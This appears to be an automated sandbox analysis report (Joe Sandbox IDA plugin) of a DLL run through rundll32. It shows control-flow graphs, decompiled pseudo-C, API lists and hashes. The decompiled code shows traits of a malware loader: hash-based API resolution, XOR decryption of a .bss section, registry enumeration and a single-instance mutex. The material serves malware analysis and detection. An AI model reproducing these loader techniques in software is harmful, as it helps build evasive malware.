                  control_flow_graph 0 18000508c-1800050da HeapAlloc 1 180005419 0->1 2 1800050e0-180005112 memset InitializeCriticalSection call 180008b44 0->2 3 18000541e-18000543a 1->3 6 180005118-180005131 call 180007678 call 18000459c 2->6 7 18000540f-180005417 call 180005578 2->7 14 180005133-180005142 6->14 15 180005144 6->15 7->3 16 180005147-18000514e 14->16 15->16 18 18000515b-180005184 HeapAlloc 16->18 19 180005150-180005156 GetLastError 16->19 21 180005226 18->21 22 18000518a-1800051b0 RegOpenKeyW 18->22 20 180005408-18000540d 19->20 20->3 20->7 23 18000522b-18000522e 21->23 24 1800051b2-1800051b4 22->24 25 180005216-180005224 HeapFree 22->25 23->7 26 180005234-180005280 memcpy call 180005ca4 23->26 27 1800051cf-1800051ec RegEnumKeyW 24->27 25->23 36 180005282-18000529a call 180005ca4 26->36 37 18000529c-18000529f 26->37 28 1800051b6-1800051ca call 180009110 27->28 29 1800051ee-1800051f7 27->29 28->29 39 1800051cc 28->39 31 180005203-180005214 RegCloseKey 29->31 32 1800051f9-180005200 29->32 31->25 31->26 32->31 36->37 37->7 38 1800052a5-1800052b6 call 180006dcc 37->38 44 1800052e2-1800052e5 38->44 45 1800052b8-1800052cc call 180003c24 38->45 39->27 44->7 47 1800052eb-1800052ee call 180008708 44->47 45->44 50 1800052ce-1800052de call 180003c24 45->50 51 1800052f3-1800052f6 47->51 50->44 53 180005302-180005323 51->53 54 1800052f8-1800052fd 51->54 56 180005325-18000532d 53->56 57 180005339 53->57 54->7 58 18000533c-18000533f 56->58 59 18000532f-180005337 call 180004ed8 56->59 57->58 61 180005341-180005346 58->61 62 18000534b-180005355 58->62 59->58 61->7 64 180005357-18000535f 62->64 65 18000536e 62->65 66 180005371-180005374 64->66 67 180005361-18000536c call 180004ed8 64->67 65->66 66->61 69 180005376-180005391 GetModuleHandleA 66->69 67->66 71 180005393-1800053a7 call 18000459c 69->71 72 1800053fb-180005403 call 180002b60 69->72 76 1800053a9-1800053bc GetCurrentThreadId 71->76 77 1800053be 71->77 72->20 78 1800053c1-1800053c4 76->78 77->78 78->19 80 1800053ca-1800053db call 18000459c 78->80 83 1800053dd-1800053ec 80->83 84 1800053ee 80->84 85 1800053f1-1800053f4 83->85 84->85 85->3 87 1800053f6 85->87 87->19
                  C-Code - Quality: 50%
                  			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t55;
                  				long _t57;
                  				void* _t65;
                  				void* _t114;
                  				void* _t115;
                  				long long* _t146;
                  				void* _t147;
                  				void* _t153;
                  				int _t188;
                  				long long _t189;
                  				int _t191;
                  				long long _t192;
                  				struct _CRITICAL_SECTION* _t198;
                  				void* _t201;
                  				void* _t202;
                  				signed short* _t211;
                  				void* _t214;
                  				void* _t215;
                  				long long _t216;
                  				void* _t217;
                  				long _t219;
                  				long _t223;
                  				void* _t225;
                  
                  				_t154 = __rbx;
                  				_t146 = __rax;
                  				_t115 = __esi;
                  				 *((long long*)(_t201 + 0x20)) = __rbx;
                  				 *((long long*)(_t201 + 8)) = __rcx;
                  				_t202 = _t201 - 0x230;
                  				_t199 =  *0x8000d4a0;
                  				r14d =  *0x8000d498;
                  				HeapAlloc(_t225, _t223, _t219);
                  				r12d = 0;
                  				_t189 = __rax;
                  				if (__rax == _t217) goto 0x80005419;
                  				memset(_t217, _t188, _t191);
                  				InitializeCriticalSection(_t198);
                  				_t5 = _t189 + 0x98; // 0x98
                  				_t216 = _t5;
                  				 *_t216 = _t216;
                  				 *((long long*)(__rax + 0xa0)) = _t216;
                  				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
                  				E00000001180007678(__ecx, __rax, _t154, _t191);
                  				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t146 == _t217) goto 0x80005144;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t146();
                  				goto 0x80005147;
                  				_t147 = _t217;
                  				 *(_t189 + 0x28) = _t147;
                  				if (_t147 != _t217) goto 0x8000515b;
                  				GetLastError();
                  				goto 0x80005408;
                  				r8d = 0x1102;
                  				HeapAlloc(??, ??, ??);
                  				_t192 =  *0x8000d4a0;
                  				if (_t192 == _t217) goto 0x80005226;
                  				 *_t192 = r12w; // executed
                  				_t55 = RegOpenKeyW(??, ??, ??); // executed
                  				if (_t55 != r12d) goto 0x80005216;
                  				goto 0x800051cf;
                  				r12d = r12d + 1;
                  				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
                  				r9d = 0x104; // executed
                  				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
                  				if (_t57 == 0) goto 0x800051b6;
                  				r12d = 0;
                  				if (_t57 != 0x103) goto 0x80005203;
                  				 *0x8000d480 = _t192;
                  				RegCloseKey(??); // executed
                  				if (r12d == r12d) goto 0x80005234;
                  				HeapFree(??, ??, ??);
                  				goto 0x8000522b;
                  				if (8 != r12d) goto 0x8000540f;
                  				_t193 =  *0x8000d490;
                  				r8d = 8;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
                  				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
                  				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
                  				_t28 = _t189 + 8; // 0x8
                  				_t186 = _t28;
                  				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
                  				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x30)) = 0x180000000;
                  				if (0x180000000 == _t217) goto 0x800052e2;
                  				_t30 = _t189 + 8; // 0x8
                  				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x38)) = 0x180000000;
                  				_t90 =  !=  ? r12d : 8;
                  				_t132 = ( !=  ? r12d : 8) - r12d;
                  				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
                  				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
                  				goto 0x8000540f;
                  				_t211 =  *0x8000d490 + 0x18000f000;
                  				r9d = _t211[1] & 0x0000ffff;
                  				r11d =  *_t211 & 0x0000ffff;
                  				_t215 = __r9 + 8;
                  				if (_t216 - _t215 <= 0) goto 0x80005339;
                  				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
                  				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
                  				goto 0x8000533c;
                  				if (_t217 != _t217) goto 0x8000534b;
                  				goto 0x8000540f;
                  				r14d = r14d ^ 0xecb028fc;
                  				if (_t216 - _t215 <= 0) goto 0x8000536e;
                  				if (r14d == r12d) goto 0x80005371;
                  				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
                  				goto 0x80005371;
                  				_t153 = _t217;
                  				if (_t153 == _t217) goto 0x80005341;
                  				 *(_t189 + 0x40) = _t211;
                  				 *0x8000d488 = _t189;
                  				GetModuleHandleA(??);
                  				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
                  				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053be;
                  				r8d = GetCurrentThreadId();
                  				 *_t153();
                  				goto 0x800053c1;
                  				if (_t217 == _t217) goto 0x80005150;
                  				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053ee;
                  				 *_t153();
                  				goto 0x800053f1;
                  				if (r12d != r12d) goto 0x8000541e;
                  				goto 0x80005150;
                  				asm("lock add dword [ebp+0x38], 0x1");
                  				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
                  				E00000001180005578(_t154, _t189, _t217);
                  				goto 0x8000541e;
                  				return 8;
                  			}





























                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x180005091
                  0x1800050a1
                  0x1800050a8
                  0x1800050b6
                  0x1800050cb
                  0x1800050d1
                  0x1800050d4
                  0x1800050da
                  0x1800050e8
                  0x1800050f1
                  0x1800050f7
                  0x1800050f7
                  0x1800050fe
                  0x180005101
                  0x180005112
                  0x18000511b
                  0x180005129
                  0x180005131
                  0x180005138
                  0x18000513b
                  0x180005140
                  0x180005142
                  0x180005144
                  0x180005147
                  0x18000514e
                  0x180005150
                  0x180005156
                  0x180005164
                  0x180005171
                  0x180005177
                  0x180005184
                  0x1800051a1
                  0x1800051a5
                  0x1800051b0
                  0x1800051b4
                  0x1800051be
                  0x1800051ca
                  0x1800051dc
                  0x1800051e2
                  0x1800051ec
                  0x1800051ee
                  0x1800051f7
                  0x1800051f9
                  0x18000520b
                  0x180005214
                  0x18000521e
                  0x180005224
                  0x18000522e
                  0x180005234
                  0x180005248
                  0x18000524e
                  0x18000526d
                  0x180005280
                  0x18000529f
                  0x1800052a5
                  0x1800052a5
                  0x1800052b6
                  0x1800052c0
                  0x1800052c5
                  0x1800052cc
                  0x1800052ce
                  0x1800052d2
                  0x1800052da
                  0x1800052de
                  0x1800052e2
                  0x1800052e5
                  0x1800052f6
                  0x1800052fd
                  0x180005302
                  0x18000530d
                  0x180005312
                  0x18000531c
                  0x180005323
                  0x18000532d
                  0x180005332
                  0x180005337
                  0x18000533f
                  0x180005346
                  0x18000534b
                  0x180005355
                  0x18000535f
                  0x180005367
                  0x18000536c
                  0x18000536e
                  0x180005374
                  0x180005378
                  0x18000537c
                  0x180005383
                  0x180005391
                  0x18000539c
                  0x1800053a7
                  0x1800053b4
                  0x1800053b7
                  0x1800053bc
                  0x1800053c4
                  0x1800053d3
                  0x1800053db
                  0x1800053ea
                  0x1800053ec
                  0x1800053f4
                  0x1800053f6
                  0x1800053fb
                  0x18000540d
                  0x180005412
                  0x180005417
                  0x18000543a

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenSectionThreadmemcpymemset
                  • String ID:
                  • API String ID: 2014251338-0
                  • Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
                  • Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
                  • String ID:
                  • API String ID: 2375947951-0
                  • Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
                  • Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 38%
                  			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
                  				intOrPtr _t22;
                  				intOrPtr _t23;
                  				void* _t46;
                  				long long _t56;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr* _t76;
                  				long long _t80;
                  				long long _t82;
                  				void* _t83;
                  				long long _t85;
                  				void* _t91;
                  				void* _t92;
                  				long _t93;
                  				long _t95;
                  				long _t97;
                  
                  				_t92 = __r11;
                  				_t56 = _t85;
                  				 *((long long*)(_t56 + 8)) = __rbx;
                  				 *((long long*)(_t56 + 0x10)) = _t82;
                  				 *((long long*)(_t56 + 0x18)) = __rsi;
                  				 *((long long*)(_t56 + 0x20)) = __rdi;
                  				_t83 = __rcx;
                  				r8d = 0;
                  				HeapCreate(_t97, _t95, _t93); // executed
                  				_t80 = _t56;
                  				if (_t56 == 0) goto 0x8000506b;
                  				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                  				_t75 = _t56 + _t72 + 0x68;
                  				_t22 =  *_t75;
                  				if (_t22 == 0) goto 0x80004ffc;
                  				if (_t22 == 0x7373622e) goto 0x80004f8a;
                  				_t76 = _t75 + 0x28;
                  				_t23 =  *_t76;
                  				if (_t23 != 0) goto 0x80004f79;
                  				if (_t23 == 0) goto 0x80004ffc;
                  				r13d =  *(_t76 + 0x10);
                  				r12d =  *(_t76 + 0x14);
                  				r12d = r12d ^  *(_t72 + 8);
                  				r12d = r12d ^ r13d;
                  				HeapAlloc(??, ??, ??);
                  				if (_t56 == 0) goto 0x80004ff5;
                  				r9d = r12d;
                  				r8d = r13d;
                  				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
                  				r11d =  *((intOrPtr*)(_t76 + 0xc));
                  				 *0x8000d490 = _t56 - _t92 - _t83;
                  				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
                  				goto 0x80005001;
                  				goto 0x80005001;
                  				if (2 == 0) goto 0x80005010;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				HeapAlloc(??, ??, ??);
                  				if (0x80011040 != 0) goto 0x80005049;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				0x8000236a();
                  				 *0x180011048 = _t80;
                  				 *0x8000d4a0 = 0x80011040;
                  				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
                  			}



















                  0x180004f1c
                  0x180004f1c
                  0x180004f1f
                  0x180004f23
                  0x180004f27
                  0x180004f2b
                  0x180004f39
                  0x180004f3c
                  0x180004f4b
                  0x180004f51
                  0x180004f57
                  0x180004f63
                  0x180004f6a
                  0x180004f6f
                  0x180004f73
                  0x180004f7e
                  0x180004f80
                  0x180004f84
                  0x180004f88
                  0x180004f8c
                  0x180004f8e
                  0x180004f92
                  0x180004f99
                  0x180004fa2
                  0x180004fa5
                  0x180004fb1
                  0x180004fb6
                  0x180004fb9
                  0x180004fc2
                  0x180004fc7
                  0x180004fdd
                  0x180004fed
                  0x180004ff3
                  0x180004ffa
                  0x180005003
                  0x180005008
                  0x18000500e
                  0x18000502b
                  0x180005037
                  0x18000503c
                  0x180005047
                  0x180005051
                  0x180005059
                  0x18000505d
                  0x18000508b

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocDestroy$Create
                  • String ID: .bss
                  • API String ID: 388876957-3890483948
                  • Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
                  • Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 44%
                  			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
                  				void* _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t45;
                  				long long _t46;
                  				long long _t47;
                  				struct _SECURITY_ATTRIBUTES* _t57;
                  				long long _t60;
                  				int _t62;
                  				WCHAR* _t66;
                  				void* _t69;
                  				void* _t76;
                  				void* _t79;
                  
                  				_t47 = __rbx;
                  				_t45 = _t69;
                  				 *((long long*)(_t45 + 8)) = __rbx;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
                  				 *((intOrPtr*)(_t45 - 0x38)) = 0;
                  				0x800085dc(); // executed
                  				if (__eax == 0) goto 0x800087f7;
                  				_a16 =  *__rcx;
                  				_t46 =  &_a24;
                  				r9d = 0;
                  				_v88 = _t46;
                  				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
                  				if (_t46 == _t47) goto 0x800087f7;
                  				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t46 == _t47) goto 0x800087c0;
                  				CreateMutexW(_t57, _t62, _t66); // executed
                  				goto 0x800087c3;
                  				_t60 = _t47;
                  				if (_t60 == _t47) goto 0x800087e9;
                  				if (GetLastError() != 0xb7) goto 0x800087e0;
                  				FindCloseChangeNotification(??); // executed
                  				goto 0x800087e9;
                  				_a24 = _t60;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}

















                  0x180008708
                  0x180008708
                  0x18000870b
                  0x180008747
                  0x18000874a
                  0x180008751
                  0x180008754
                  0x18000875b
                  0x18000876f
                  0x180008776
                  0x180008786
                  0x180008789
                  0x18000878e
                  0x180008799
                  0x1800087a4
                  0x1800087ac
                  0x1800087b9
                  0x1800087be
                  0x1800087c0
                  0x1800087c6
                  0x1800087d3
                  0x1800087d8
                  0x1800087de
                  0x1800087e0
                  0x1800087f1
                  0x18000880c

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorHeapLastmemcpy$AllocChangeCloseCreateFindFreeMutexNotificationlstrlen
                  • String ID:
                  • API String ID: 4170216436-0
                  • Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
                  • Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 149 180007b94-180007be5 150 180007da3 149->150 151 180007beb-180007bf3 149->151 152 180007da8-180007db8 150->152 151->150 153 180007bf9-180007c24 RtlAllocateHeap 151->153 154 180007c2a-180007c63 memset 153->154 155 180007d9c-180007da1 153->155 156 180007c69-180007c93 154->156 157 180007d6d-180007d85 154->157 155->152 159 180007c98-180007c9b 156->159 160 180007d87-180007d8a 157->160 161 180007d8c-180007d9a HeapFree 157->161 159->157 162 180007ca1-180007caa 159->162 160->152 161->152 163 180007cd6-180007ce7 162->163 164 180007cac-180007cd1 call 180008c48 162->164 166 180007ce9-180007ced 163->166 167 180007d1d-180007d68 163->167 164->163 169 180007cfa-180007d02 166->169 170 180007cef-180007cf8 166->170 167->159 171 180007d07-180007d0e 169->171 170->171 171->166 172 180007d10-180007d18 171->172 172->167
                  APIs
                  • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                  • memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocateHeapmemset
                  • String ID:
                  • API String ID: 669713250-0
                  • Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
                  • Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 173 180002464-180002482 LoadLibraryA 174 180002484-180002495 call 180007b94 173->174 175 1800024af-1800024b5 GetLastError 173->175 179 1800024a4-1800024ad FreeLibrary 174->179 180 180002497-1800024a2 174->180 177 1800024b7-1800024c8 175->177 179->177 180->177
                  C-Code - Quality: 25%
                  			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				long long _t20;
                  				void* _t24;
                  				void* _t31;
                  				void* _t32;
                  
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				LoadLibraryA(??); // executed
                  				_t24 = __rax;
                  				if (__rax == 0) goto 0x800024af;
                  				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
                  				_t20 = _a24;
                  				 *_t20 = _t24;
                  				 *__rdx = _t20;
                  				goto 0x800024b7;
                  				FreeLibrary(??);
                  				goto 0x800024b7;
                  				return GetLastError();
                  			}







                  0x180002464
                  0x180002469
                  0x180002476
                  0x18000247c
                  0x180002482
                  0x180002495
                  0x180002497
                  0x18000249c
                  0x18000249f
                  0x1800024a2
                  0x1800024a7
                  0x1800024ad
                  0x1800024c8

                  APIs
                  • LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF
                    • Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                    • Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  • FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Library$AllocateErrorFreeHeapLastLoadmemset
                  • String ID:
                  • API String ID: 105124555-0
                  • Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
                  • Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 181 180006dcc-180006e1f call 1800089e4 184 180006e21-180006e36 lstrlenW 181->184 185 180006e8a 181->185 186 180006e38-180006e4d lstrcmpiW 184->186 187 180006e4f-180006e77 call 180002594 184->187 188 180006e8f-180006eaf 185->188 186->187 189 180006e7a-180006e88 HeapFree 186->189 187->189 189->188
                  C-Code - Quality: 67%
                  			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                  				int _t27;
                  				void* _t46;
                  				long long _t48;
                  				intOrPtr* _t63;
                  				long long _t65;
                  				intOrPtr* _t66;
                  				void* _t68;
                  				void* _t69;
                  				void* _t71;
                  				void* _t74;
                  				WCHAR* _t77;
                  				WCHAR* _t80;
                  
                  				_t48 = __rbx;
                  				_t46 = _t68;
                  				 *((long long*)(_t46 + 8)) = __rbx;
                  				 *((long long*)(_t46 + 0x10)) = _t65;
                  				 *((long long*)(_t46 + 0x18)) = __rsi;
                  				 *((long long*)(_t46 + 0x20)) = __rdi;
                  				_t69 = _t68 - 0x30;
                  				_t63 = __rcx;
                  				_t66 = __rdx;
                  				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
                  				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
                  				 *_t66 =  *_t63;
                  				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
                  				_t27 = lstrcmpiW(_t77); // executed
                  				if (_t27 == 0) goto 0x80006e7a;
                  				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
                  				r11d =  *((intOrPtr*)(_t69 + 0x20));
                  				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
                  				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
                  				HeapFree(??, ??, ??);
                  				goto 0x80006e8f;
                  				return 8;
                  			}















                  0x180006dcc
                  0x180006dcc
                  0x180006dcf
                  0x180006dd3
                  0x180006dd7
                  0x180006ddb
                  0x180006de5
                  0x180006df7
                  0x180006dfe
                  0x180006e12
                  0x180006e1f
                  0x180006e24
                  0x180006e36
                  0x180006e45
                  0x180006e4d
                  0x180006e59
                  0x180006e5e
                  0x180006e6e
                  0x180006e77
                  0x180006e82
                  0x180006e88
                  0x180006eaf

                  APIs
                    • Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
                  • lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
